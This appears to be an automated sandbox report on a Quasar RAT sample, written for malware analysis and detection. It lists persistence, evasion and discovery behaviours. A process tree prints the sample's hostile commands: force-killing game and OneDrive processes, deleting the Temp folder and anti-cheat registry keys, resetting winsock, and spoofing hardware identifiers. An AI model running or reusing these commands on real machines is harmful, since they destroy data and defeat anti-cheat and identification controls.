quasar | 3b6f8fe87241a3af1ff1414c5223a20b97f2bb2b7b7a9cb574077e253fb6db88

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Hsjdosj.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Hsjdosj.exe

Deletes itself 1 IoCs

pid	Process
984	cmd.exe

Loads dropped DLL 3 IoCs

pid	Process
1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
1680	Process not Found
1492	Gptmvmjkvvg.exe

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x0008000000013341-56.dat	themida
behavioral1/files/0x0008000000013341-58.dat	themida
behavioral1/files/0x0008000000013341-59.dat	themida
behavioral1/files/0x0008000000013341-68.dat	themida
behavioral1/memory/1528-69-0x000000013FDD0000-0x00000001405A7000-memory.dmp	themida
behavioral1/memory/1528-71-0x000000013FDD0000-0x00000001405A7000-memory.dmp	themida
behavioral1/memory/1528-72-0x000000013FDD0000-0x00000001405A7000-memory.dmp	themida
behavioral1/files/0x0008000000013341-151.dat	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Windows\CurrentVersion\Run\Venom Client Startup = "\"C:\\Windows\\SysWOW64\\Images.exe\""	Images.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Hsjdosj.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Images.exe	Images.exe
File created	C:\Windows\SysWOW64\Images.exe	Gptmvmjkvvg.exe
File opened for modification	C:\Windows\SysWOW64\Images.exe	Gptmvmjkvvg.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1528	Hsjdosj.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\IME\devcon.exe	Hsjdosj.exe
File created	C:\Windows\IME\networkclean.exe	Hsjdosj.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
2024	schtasks.exe
1880	schtasks.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "Apple-12112-19706-2221932087"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "Apple-121121970622219"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "Apple-12112-19706-2221932087"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command-Line Interface

T1059

pid	Process
1268	ipconfig.exe
1104	ipconfig.exe
2136	ipconfig.exe

Kills process with taskkill 14 IoCs

evasion

pid	Process
1996	taskkill.exe
1248	taskkill.exe
1268	taskkill.exe
1532	taskkill.exe
2000	taskkill.exe
1624	taskkill.exe
1996	taskkill.exe
1712	taskkill.exe
1256	taskkill.exe
1560	taskkill.exe
560	taskkill.exe
1104	taskkill.exe
1444	taskkill.exe
1456	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration	reg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 12122191831027659731261630990154352062912454	reg.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000_CLASSES\Interface	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000_CLASSES\Interface\ClsidStore = 0121188435251801467723012706312323235562871027872256331897	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000_CLASSES\Installer\Dependencies	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000_CLASSES\Installer	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000_CLASSES\Installer\Dependencies\MSICache = 1211884352518014677230127063123232355628710278722563	reg.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

pid	Process
760	reg.exe
1476	reg.exe
760	reg.exe
1248	reg.exe
1444	reg.exe
560	reg.exe
1476	reg.exe
2000	reg.exe
2000	reg.exe
760	reg.exe
1456	reg.exe
1984	reg.exe
1248	reg.exe
1444	reg.exe
240	reg.exe
1984	reg.exe
1716	reg.exe
1248	reg.exe
240	reg.exe
1944	reg.exe
1280	reg.exe
580	reg.exe
692	reg.exe
692	reg.exe
560	reg.exe
1984	reg.exe
1248	reg.exe
2000	reg.exe
1624	reg.exe
1456	reg.exe
1100	reg.exe
1444	reg.exe
1456	reg.exe
1280	reg.exe
1532	reg.exe
1532	reg.exe
560	reg.exe
2016	reg.exe
1944	reg.exe
1964	reg.exe
1532	reg.exe
1964	reg.exe
1456	reg.exe
1532	reg.exe
760	reg.exe
560	reg.exe
1444	reg.exe
580	reg.exe
240	reg.exe
1624	reg.exe
692	reg.exe
692	reg.exe
2016	reg.exe
1984	reg.exe
2000	reg.exe
1456	reg.exe
1280	reg.exe
1984	reg.exe
1248	reg.exe
1984	reg.exe
1100	reg.exe
1624	reg.exe
1964	reg.exe
560	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1196	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe
1440	Images.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	848	Oajujxo.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	1104	taskkill.exe
Token: SeDebugPrivilege	1444	taskkill.exe
Token: SeDebugPrivilege	1492	Gptmvmjkvvg.exe
Token: SeDebugPrivilege	1712	taskkill.exe
Token: SeDebugPrivilege	1256	taskkill.exe
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeDebugPrivilege	1456	taskkill.exe
Token: SeDebugPrivilege	1268	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	1532	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeDebugPrivilege	1440	Images.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeSecurityPrivilege	1492	Gptmvmjkvvg.exe
Token: SeBackupPrivilege	1492	Gptmvmjkvvg.exe
Token: SeDebugPrivilege	1440	Images.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1176 wrote to memory of 1528	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	29
PID 1176 wrote to memory of 1528	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	29
PID 1176 wrote to memory of 1528	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	29
PID 1176 wrote to memory of 1492	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	31
PID 1176 wrote to memory of 1492	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	31
PID 1176 wrote to memory of 1492	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	31
PID 1176 wrote to memory of 1492	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	31
PID 1176 wrote to memory of 848	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	32
PID 1176 wrote to memory of 848	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	32
PID 1176 wrote to memory of 848	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	32
PID 1176 wrote to memory of 848	1176	3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe	32
PID 1528 wrote to memory of 1312	1528	Hsjdosj.exe	34
PID 1528 wrote to memory of 1312	1528	Hsjdosj.exe	34
PID 1528 wrote to memory of 1312	1528	Hsjdosj.exe	34
PID 1528 wrote to memory of 984	1528	Hsjdosj.exe	35
PID 1528 wrote to memory of 984	1528	Hsjdosj.exe	35
PID 1528 wrote to memory of 984	1528	Hsjdosj.exe	35
PID 1528 wrote to memory of 1552	1528	Hsjdosj.exe	36
PID 1528 wrote to memory of 1552	1528	Hsjdosj.exe	36
PID 1528 wrote to memory of 1552	1528	Hsjdosj.exe	36
PID 1528 wrote to memory of 1508	1528	Hsjdosj.exe	37
PID 1528 wrote to memory of 1508	1528	Hsjdosj.exe	37
PID 1528 wrote to memory of 1508	1528	Hsjdosj.exe	37
PID 1528 wrote to memory of 1644	1528	Hsjdosj.exe	41
PID 1528 wrote to memory of 1644	1528	Hsjdosj.exe	41
PID 1528 wrote to memory of 1644	1528	Hsjdosj.exe	41
PID 1644 wrote to memory of 1996	1644	cmd.exe	42
PID 1644 wrote to memory of 1996	1644	cmd.exe	42
PID 1644 wrote to memory of 1996	1644	cmd.exe	42
PID 1528 wrote to memory of 1656	1528	Hsjdosj.exe	43
PID 1528 wrote to memory of 1656	1528	Hsjdosj.exe	43
PID 1528 wrote to memory of 1656	1528	Hsjdosj.exe	43
PID 1656 wrote to memory of 1104	1656	cmd.exe	44
PID 1656 wrote to memory of 1104	1656	cmd.exe	44
PID 1656 wrote to memory of 1104	1656	cmd.exe	44
PID 1528 wrote to memory of 1932	1528	Hsjdosj.exe	45
PID 1528 wrote to memory of 1932	1528	Hsjdosj.exe	45
PID 1528 wrote to memory of 1932	1528	Hsjdosj.exe	45
PID 1932 wrote to memory of 1444	1932	cmd.exe	46
PID 1932 wrote to memory of 1444	1932	cmd.exe	46
PID 1932 wrote to memory of 1444	1932	cmd.exe	46
PID 1528 wrote to memory of 1976	1528	Hsjdosj.exe	47
PID 1528 wrote to memory of 1976	1528	Hsjdosj.exe	47
PID 1528 wrote to memory of 1976	1528	Hsjdosj.exe	47
PID 1976 wrote to memory of 1712	1976	cmd.exe	48
PID 1976 wrote to memory of 1712	1976	cmd.exe	48
PID 1976 wrote to memory of 1712	1976	cmd.exe	48
PID 1528 wrote to memory of 1920	1528	Hsjdosj.exe	49
PID 1528 wrote to memory of 1920	1528	Hsjdosj.exe	49
PID 1528 wrote to memory of 1920	1528	Hsjdosj.exe	49
PID 1920 wrote to memory of 1256	1920	cmd.exe	50
PID 1920 wrote to memory of 1256	1920	cmd.exe	50
PID 1920 wrote to memory of 1256	1920	cmd.exe	50
PID 1528 wrote to memory of 1228	1528	Hsjdosj.exe	51
PID 1528 wrote to memory of 1228	1528	Hsjdosj.exe	51
PID 1528 wrote to memory of 1228	1528	Hsjdosj.exe	51
PID 1228 wrote to memory of 1248	1228	cmd.exe	52
PID 1228 wrote to memory of 1248	1228	cmd.exe	52
PID 1228 wrote to memory of 1248	1228	cmd.exe	52
PID 1528 wrote to memory of 1996	1528	Hsjdosj.exe	54
PID 1528 wrote to memory of 1996	1528	Hsjdosj.exe	54
PID 1528 wrote to memory of 1996	1528	Hsjdosj.exe	54
PID 1492 wrote to memory of 2024	1492	Gptmvmjkvvg.exe	53
PID 1492 wrote to memory of 2024	1492	Gptmvmjkvvg.exe	53

C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe
"C:\Users\Admin\AppData\Local\Temp\3B6F8FE87241A3AF1FF1414C5223A20B97F2BB2B7B7A9.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1176
- C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe
  "C:\Users\Admin\AppData\Local\Temp\Hsjdosj.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c Color 0b
    3⤵
    PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    - Deletes itself
    PID:984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im steam.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1656
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im steam.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1932
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FortniteClient-Win64-Shipping.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OneDrive.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1976
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OneDrive.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1920
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1228
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1996
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1880
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1804
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1516
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1584
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1932
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1656
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1980
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im EpicGamesLauncher.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
    3⤵
    PID:1428
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EasyAntiCheat /f
      4⤵
      Modifies registry key
      PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    PID:1644
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
      4⤵
      Modifies registry key
      PID:1716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    PID:852
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
      4⤵
      Modifies registry key
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:560
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-12109 /f
      4⤵
      PID:1656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:1984
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-12109 /f
      4⤵
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple%random%-%random%-%random%-%random% /f
    3⤵
    PID:1980
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d Apple12109-8958-4355-8023 /f
      4⤵
      PID:1712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-%random%-%random} /f
    3⤵
    PID:1932
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {Apple-12112-%random} /f
      4⤵
      Modifies registry key
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
    3⤵
    PID:1524
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d Apple-121121970622219 /f
      4⤵
      Modifies registry key
      PID:1456
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset
      4⤵
      PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-%random% /f
    3⤵
    PID:620
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d Apple-12112 /f
      4⤵
      Modifies registry key
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-%random% /f
    3⤵
    PID:580
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d Apple-12112 /f
      4⤵
      PID:1964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-%random%%random%%random% /f
    3⤵
    PID:1100
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d Apple-121121970622219 /f
      4⤵
      Enumerates system info in registry
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:1444
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-12112-19706-2221932087} /f
      4⤵
      Modifies registry key
      PID:560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2016
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {Apple-12112-19706-2221932087} /f
      4⤵
      Modifies registry key
      PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-%random%-%random%-%random%%random%} /f
    3⤵
    PID:1280
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {Apple-12112-19706-2221932087} /f
      4⤵
      Modifies registry key
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1964
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d Apple-12112-19706-2221932087 /f
      4⤵
      Modifies registry key
      PID:580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-%random%-%random%-%random%%random% /f
    3⤵
    PID:1248
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d Apple-12112-19706-2221932087 /f
      4⤵
      Modifies registry key
      PID:1624
- - C:\Windows\system32\cmd.exe
